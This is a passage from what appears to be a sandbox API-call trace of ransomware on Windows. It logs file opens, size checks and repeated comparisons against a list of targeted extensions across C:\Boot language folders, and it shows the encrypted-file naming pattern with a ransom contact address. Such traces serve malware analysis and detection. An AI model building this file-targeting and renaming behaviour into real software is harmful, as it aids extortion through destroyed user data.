(lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui")) returned 0x20 [0033.716] GetFileAttributesW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0033.717] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0033.717] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0033.717] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0033.717] lstrlenW (lpString=".doc") returned 4 [0033.717] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0033.717] lstrlenW (lpString=".docx") returned 5 [0033.717] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0033.717] lstrlenW (lpString=".pdf") returned 4 [0033.717] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0033.717] lstrlenW (lpString=".xls") returned 4 [0033.717] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0033.717] lstrlenW (lpString=".xlsx") returned 5 [0033.717] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0033.717] lstrlenW (lpString=".ppt") returned 4 [0033.717] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0033.717] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0033.717] lstrlenW (lpString=".zip") returned 4 [0033.717] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0033.717] lstrlenW (lpString=".rar") returned 4 [0033.717] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0033.717] lstrlenW (lpString=".bz2") returned 4 [0033.717] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0033.717] lstrlenW (lpString=".7z") returned 3 [0033.717] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0033.717] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0033.717] lstrlenW (lpString=".dbf") returned 4 [0033.717] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0033.717] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0033.717] lstrlenW (lpString=".1cd") returned 4 [0033.717] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0033.717] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0033.717] lstrlenW (lpString=".jpg") returned 4 [0033.717] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0033.718] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0033.718] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0033.718] lstrlenW (lpString=".doc") returned 4 [0033.718] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0033.718] lstrlenW (lpString=".docx") returned 5 [0033.718] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0033.718] lstrlenW (lpString=".pdf") returned 4 [0033.718] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0033.718] lstrlenW (lpString=".xls") returned 4 [0033.718] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0033.718] lstrlenW (lpString=".xlsx") returned 5 [0033.718] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0033.718] lstrlenW (lpString=".ppt") returned 4 [0033.718] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0033.718] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0033.718] lstrlenW (lpString=".zip") returned 4 [0033.718] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0033.718] lstrlenW (lpString=".rar") returned 4 [0033.718] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0033.718] lstrlenW (lpString=".bz2") returned 4 [0033.718] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0033.718] lstrlenW (lpString=".7z") returned 3 [0033.718] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0033.718] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0033.718] lstrlenW (lpString=".dbf") returned 4 [0033.718] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0033.718] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0033.718] lstrlenW (lpString=".1cd") returned 4 [0033.718] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0033.718] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0033.718] lstrlenW (lpString=".jpg") returned 4 [0033.718] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0033.719] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0033.719] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0033.719] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0033.719] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=90688) returned 1 [0033.719] CloseHandle (hObject=0x174) returned 1 [0033.719] GetFileAttributesW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui")) returned 0x20 [0033.719] GetFileAttributesW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0033.719] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0033.719] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0033.719] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0033.719] lstrlenW (lpString=".doc") returned 4 [0033.719] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0033.719] lstrlenW (lpString=".docx") returned 5 [0033.719] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0033.719] lstrlenW (lpString=".pdf") returned 4 [0033.719] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0033.719] lstrlenW (lpString=".xls") returned 4 [0033.719] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0033.719] lstrlenW (lpString=".xlsx") returned 5 [0033.719] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0033.720] lstrlenW (lpString=".ppt") returned 4 [0033.720] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0033.720] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0033.720] lstrlenW (lpString=".zip") returned 4 [0033.720] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0033.720] lstrlenW (lpString=".rar") returned 4 [0033.720] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0033.720] lstrlenW (lpString=".bz2") returned 4 [0033.720] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0033.720] lstrlenW (lpString=".7z") returned 3 [0033.720] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0033.720] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0033.720] lstrlenW (lpString=".dbf") returned 4 [0033.720] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0033.720] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0033.720] lstrlenW (lpString=".1cd") returned 4 [0033.720] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0033.720] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0033.720] lstrlenW (lpString=".jpg") returned 4 [0033.720] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0033.720] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0033.720] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0033.720] lstrlenW (lpString=".doc") returned 4 [0033.720] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0033.720] lstrlenW (lpString=".docx") returned 5 [0033.720] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0033.720] lstrlenW (lpString=".pdf") returned 4 [0033.720] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0033.720] lstrlenW (lpString=".xls") returned 4 [0033.720] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0033.720] lstrlenW (lpString=".xlsx") returned 5 [0033.720] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0033.720] lstrlenW (lpString=".ppt") returned 4 [0033.721] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0033.721] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0033.721] lstrlenW (lpString=".zip") returned 4 [0033.721] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0033.721] lstrlenW (lpString=".rar") returned 4 [0033.721] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0033.721] lstrlenW (lpString=".bz2") returned 4 [0033.721] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0033.721] lstrlenW (lpString=".7z") returned 3 [0033.721] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0033.721] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0033.721] lstrlenW (lpString=".dbf") returned 4 [0033.721] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0033.721] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0033.721] lstrlenW (lpString=".1cd") returned 4 [0033.721] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0033.721] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0033.721] lstrlenW (lpString=".jpg") returned 4 [0033.721] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0033.721] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0033.721] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0033.721] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0033.721] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=90704) returned 1 [0033.721] CloseHandle (hObject=0x174) returned 1 [0033.722] GetFileAttributesW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui")) returned 0x20 [0033.722] GetFileAttributesW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0033.722] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0033.722] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0033.722] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0033.722] lstrlenW (lpString=".doc") returned 4 [0033.722] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0033.722] lstrlenW (lpString=".docx") returned 5 [0033.722] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0033.722] lstrlenW (lpString=".pdf") returned 4 [0033.722] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0033.722] lstrlenW (lpString=".xls") returned 4 [0033.722] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0033.722] lstrlenW (lpString=".xlsx") returned 5 [0033.722] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0033.722] lstrlenW (lpString=".ppt") returned 4 [0033.722] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0033.722] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0033.722] lstrlenW (lpString=".zip") returned 4 [0033.722] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0033.722] lstrlenW (lpString=".rar") returned 4 [0033.722] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0033.722] lstrlenW (lpString=".bz2") returned 4 [0033.722] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0033.722] lstrlenW (lpString=".7z") returned 3 [0033.722] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0033.722] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0033.722] lstrlenW (lpString=".dbf") returned 4 [0033.722] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0033.722] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0033.722] lstrlenW (lpString=".1cd") returned 4 [0033.723] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0033.723] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0033.723] lstrlenW (lpString=".jpg") returned 4 [0033.723] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0033.723] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0033.723] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0033.723] lstrlenW (lpString=".doc") returned 4 [0033.723] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0033.723] lstrlenW (lpString=".docx") returned 5 [0033.723] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0033.723] lstrlenW (lpString=".pdf") returned 4 [0033.723] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0033.723] lstrlenW (lpString=".xls") returned 4 [0033.723] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0033.723] lstrlenW (lpString=".xlsx") returned 5 [0033.723] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0033.723] lstrlenW (lpString=".ppt") returned 4 [0033.723] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0033.723] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0033.723] lstrlenW (lpString=".zip") returned 4 [0033.723] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0033.723] lstrlenW (lpString=".rar") returned 4 [0033.723] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0033.723] lstrlenW (lpString=".bz2") returned 4 [0033.723] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0033.723] lstrlenW (lpString=".7z") returned 3 [0033.723] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0033.723] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0033.723] lstrlenW (lpString=".dbf") returned 4 [0033.724] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0033.724] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0033.724] lstrlenW (lpString=".1cd") returned 4 [0033.724] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0033.724] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0033.724] lstrlenW (lpString=".jpg") returned 4 [0033.724] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0033.724] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0033.724] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0033.724] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0033.732] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=76352) returned 1 [0033.732] CloseHandle (hObject=0x174) returned 1 [0033.732] GetFileAttributesW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui")) returned 0x20 [0033.732] GetFileAttributesW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0033.732] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0033.733] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0033.733] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0033.733] lstrlenW (lpString=".doc") returned 4 [0033.733] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0033.733] lstrlenW (lpString=".docx") returned 5 [0033.733] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0033.733] lstrlenW (lpString=".pdf") returned 4 [0033.733] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0033.733] lstrlenW (lpString=".xls") returned 4 [0033.733] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0033.733] lstrlenW (lpString=".xlsx") returned 5 [0033.733] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0033.733] lstrlenW (lpString=".ppt") returned 4 [0033.733] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0033.733] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0033.733] lstrlenW (lpString=".zip") returned 4 [0033.733] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0033.733] lstrlenW (lpString=".rar") returned 4 [0033.733] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0033.733] lstrlenW (lpString=".bz2") returned 4 [0033.733] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0033.733] lstrlenW (lpString=".7z") returned 3 [0033.733] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0033.733] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0033.733] lstrlenW (lpString=".dbf") returned 4 [0033.733] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0033.733] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0033.733] lstrlenW (lpString=".1cd") returned 4 [0033.733] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0033.733] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0033.733] lstrlenW (lpString=".jpg") returned 4 [0033.733] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0033.733] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0033.733] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0033.734] lstrlenW (lpString=".doc") returned 4 [0033.734] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0033.734] lstrlenW (lpString=".docx") returned 5 [0033.734] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0033.734] lstrlenW (lpString=".pdf") returned 4 [0033.734] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0033.734] lstrlenW (lpString=".xls") returned 4 [0033.734] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0033.734] lstrlenW (lpString=".xlsx") returned 5 [0033.734] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0033.734] lstrlenW (lpString=".ppt") returned 4 [0033.734] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0033.734] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0033.734] lstrlenW (lpString=".zip") returned 4 [0033.734] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0033.734] lstrlenW (lpString=".rar") returned 4 [0033.734] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0033.734] lstrlenW (lpString=".bz2") returned 4 [0033.734] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0033.734] lstrlenW (lpString=".7z") returned 3 [0033.734] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0033.734] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0033.734] lstrlenW (lpString=".dbf") returned 4 [0033.734] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0033.734] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0033.734] lstrlenW (lpString=".1cd") returned 4 [0033.734] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0033.734] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0033.734] lstrlenW (lpString=".jpg") returned 4 [0033.734] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0033.735] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0033.735] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0033.735] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0033.735] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=75344) returned 1 [0033.735] CloseHandle (hObject=0x174) returned 1 [0033.735] GetFileAttributesW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui")) returned 0x20 [0033.735] GetFileAttributesW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0033.735] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0033.735] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0033.735] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0033.735] lstrlenW (lpString=".doc") returned 4 [0033.735] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0033.735] lstrlenW (lpString=".docx") returned 5 [0033.735] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0033.735] lstrlenW (lpString=".pdf") returned 4 [0033.735] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0033.735] lstrlenW (lpString=".xls") returned 4 [0033.735] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0033.735] lstrlenW (lpString=".xlsx") returned 5 [0033.735] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0033.735] lstrlenW (lpString=".ppt") returned 4 [0033.736] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0033.736] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0033.736] lstrlenW (lpString=".zip") returned 4 [0033.736] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0033.736] lstrlenW (lpString=".rar") returned 4 [0033.736] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0033.736] lstrlenW (lpString=".bz2") returned 4 [0033.736] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0033.736] lstrlenW (lpString=".7z") returned 3 [0033.736] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0033.736] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0033.736] lstrlenW (lpString=".dbf") returned 4 [0033.736] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0033.736] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0033.736] lstrlenW (lpString=".1cd") returned 4 [0033.736] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0033.736] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0033.736] lstrlenW (lpString=".jpg") returned 4 [0033.736] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0033.736] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0033.736] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0033.736] lstrlenW (lpString=".doc") returned 4 [0033.736] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0033.736] lstrlenW (lpString=".docx") returned 5 [0033.736] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0033.736] lstrlenW (lpString=".pdf") returned 4 [0033.736] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0033.736] lstrlenW (lpString=".xls") returned 4 [0033.736] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0033.736] lstrlenW (lpString=".xlsx") returned 5 [0033.736] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0033.736] lstrlenW (lpString=".ppt") returned 4 [0033.736] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0033.736] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0033.737] lstrlenW (lpString=".zip") returned 4 [0033.737] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0033.737] lstrlenW (lpString=".rar") returned 4 [0033.737] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0033.737] lstrlenW (lpString=".bz2") returned 4 [0033.737] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0033.737] lstrlenW (lpString=".7z") returned 3 [0033.737] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0033.737] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0033.737] lstrlenW (lpString=".dbf") returned 4 [0033.737] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0033.737] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0033.737] lstrlenW (lpString=".1cd") returned 4 [0033.737] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0033.737] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0033.737] lstrlenW (lpString=".jpg") returned 4 [0033.737] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0033.737] lstrcmpiW (lpString1=".exe", lpString2=".0day") returned 1 [0033.737] lstrlenW (lpString="memtest.exe") returned 11 [0033.737] CreateFileW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 